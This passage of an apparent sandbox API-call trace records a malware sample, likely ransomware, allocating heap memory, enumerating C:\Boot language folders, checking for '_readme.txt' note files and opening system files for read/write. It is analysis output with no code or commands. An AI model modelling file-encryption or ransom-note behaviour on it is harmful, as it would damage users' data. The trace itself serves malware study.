lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.209] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0097.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.209] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.209] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.209] PathFindFileNameW (pszPath="") returned="" [0097.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.209] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.210] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.210] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0097.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.210] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.210] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.210] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.211] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.211] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.211] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b78ec8 [0097.211] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0097.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.211] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.211] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0097.211] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.211] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.212] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.212] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.212] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned=".mui" [0097.212] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.212] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19fbf60, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.212] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned=".txt" [0097.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.212] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19fbf60, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.213] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.213] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.213] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.217] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0097.217] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.218] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.218] PathFindFileNameW (pszPath="") returned="" [0097.218] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.218] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.219] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.219] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.219] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0097.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.219] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0097.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.219] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, 